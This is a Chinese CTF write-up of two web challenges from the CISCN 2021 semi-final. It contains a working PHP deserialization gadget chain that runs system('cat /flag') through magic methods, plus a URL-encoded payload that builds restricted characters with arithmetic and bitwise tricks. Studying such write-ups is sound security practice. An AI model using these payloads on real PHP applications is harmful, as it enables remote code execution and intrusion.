ciscn2021半决赛-华南赛区

Comments

ciscn2021半决赛-华南赛区

easy_seri

16进制去绕过一个完全用不到的key,无用。后想到静态调用得到demo.php源码

1
2
$a = 'Test::getHint';
echo serialize($a); //s:13:"Test::getHint";

微信图片_20210619202148

demo.php源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<?php
class Fake{
	public $firm;
	public $test;
	public function __set($firm,$test){
	$test = "No,You can't";
	$firm = unserialize($firm);
	call_user_func($firm,$test);
  }
}
class Temp{
	public $pri;
	public $fin=1;
	public function __destruct()
	{
		$a=$this->action;
       $this->pri->$a = $this->fin;
	}

}

class OwO{
    public $fc;
    public $args;	
	function run()
	{
		return ($this->fc)($this->args);
	}
}
$d = $_GET['poc'];
unserialize($d);
?>

明显调用通过__destruct调用fake中的__set去动态调用OwO中的run,__destruct中的$a就是作为回调函数的数组$firm,数组的第一个值为OwO对象,第二个值为function名字run,既可以动态调用run函数,构造Temp中的action变量,序列化后传入。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
class Fake{
	public $firm ;
	public $test ;
}
class Temp{
	public $pri;
	public $fin ;
	public $action;
}

class OwO{
    public $fc = "system";
    public $args = "cat /flag";		
}

$fake = new Fake();
$temp = new Temp();
$o = new OwO();
//$c = array($o,'run');
//echo serialize($c);得到传入action的数据

$temp->action = 'a:2:{i:0;O:3:"OwO":2:{s:2:"fc";s:6:"system";s:4:"args";s:9:"cat /flag";}i:1;s:3:"run";}';

$temp->pri = $fake;
echo (serialize($temp));

//demo.php?poc=O:4:"Temp":3:{s:3:"pri";O:4:"Fake":2:{s:4:"firm";N;s:4:"test";N;}s:3:"fin";N;s:6:"action";s:87:"a:2:{i:0;O:3:"OwO":2:{s:2:"fc";s:6:"system";s:4:"args";s:9:"cat /flag";}i:1;s:3:"run";}";}

微信图片_20210619202212

magicchar

代码审计+构造字母绕过

1.可以控制的参数是yell。

2.只允许ascii32-ascii126的字符。

3.过滤了大写字母(除了W)和[等字符。

4.开启了数据缓冲区,out变量将数据缓冲区的内容读出。

5.out变量等于Wa4nn就可以打印flag。

过程:利用之前做题目保留的构造字母笔记,通过黑名单外其他字符,构造出了a和4和nn

4:

1
(((4).(0)){0})

a:

1
(((((0/0).(0)){1})|(((-2).(1)){0})&(((1).(0)){0})))

nn:

1
(((((999**999).(1)){2})|((((4).(0)){0})&(((-1).(0)){0})))&((((0/0).(0)){1})|((((2).(0)){0})&((((-1).(0)){0})|(((999**999).(1)){1}))))|(((999**999).(1)){1})).(((((999**999).(1)){2})|((((4).(0)){0})&(((-1).(0)){0})))&((((0/0).(0)){1})|((((2).(0)){0})&((((-1).(0)){0})|(((999**999).(1)){1}))))|(((999**999).(1)){1}))

将W和a4nn拼接起来

1
W.(((((0/0).(0)){1})|(((-2).(1)){0})&(((1).(0)){0}))).(((4).(0)){0}).(((((999**999).(1)){2})|((((4).(0)){0})&(((-1).(0)){0})))&((((0/0).(0)){1})|((((2).(0)){0})&((((-1).(0)){0})|(((999**999).(1)){1}))))|(((999**999).(1)){1})).(((((999**999).(1)){2})|((((4).(0)){0})&(((-1).(0)){0})))&((((0/0).(0)){1})|((((2).(0)){0})&((((-1).(0)){0})|(((999**999).(1)){1}))))|(((999**999).(1)){1}))

再进行url编码构成payload

1
%57%2e%28%28%28%28%28%30%2f%30%29%2e%28%30%29%29%7b%31%7d%29%7c%28%28%28%2d%32%29%2e%28%31%29%29%7b%30%7d%29%26%28%28%28%31%29%2e%28%30%29%29%7b%30%7d%29%29%29%2e%28%28%28%34%29%2e%28%30%29%29%7b%30%7d%29%2e%28%28%28%28%28%39%39%39%2a%2a%39%39%39%29%2e%28%31%29%29%7b%32%7d%29%7c%28%28%28%28%34%29%2e%28%30%29%29%7b%30%7d%29%26%28%28%28%2d%31%29%2e%28%30%29%29%7b%30%7d%29%29%29%26%28%28%28%28%30%2f%30%29%2e%28%30%29%29%7b%31%7d%29%7c%28%28%28%28%32%29%2e%28%30%29%29%7b%30%7d%29%26%28%28%28%28%2d%31%29%2e%28%30%29%29%7b%30%7d%29%7c%28%28%28%39%39%39%2a%2a%39%39%39%29%2e%28%31%29%29%7b%31%7d%29%29%29%29%7c%28%28%28%39%39%39%2a%2a%39%39%39%29%2e%28%31%29%29%7b%31%7d%29%29%2e%28%28%28%28%28%39%39%39%2a%2a%39%39%39%29%2e%28%31%29%29%7b%32%7d%29%7c%28%28%28%28%34%29%2e%28%30%29%29%7b%30%7d%29%26%28%28%28%2d%31%29%2e%28%30%29%29%7b%30%7d%29%29%29%26%28%28%28%28%30%2f%30%29%2e%28%30%29%29%7b%31%7d%29%7c%28%28%28%28%32%29%2e%28%30%29%29%7b%30%7d%29%26%28%28%28%28%2d%31%29%2e%28%30%29%29%7b%30%7d%29%7c%28%28%28%39%39%39%2a%2a%39%39%39%29%2e%28%31%29%29%7b%31%7d%29%29%29%29%7c%28%28%28%39%39%39%2a%2a%39%39%39%29%2e%28%31%29%29%7b%31%7d%29%29

image-20210619180958754

chickenmushroomWeb

平平无奇的小红帽。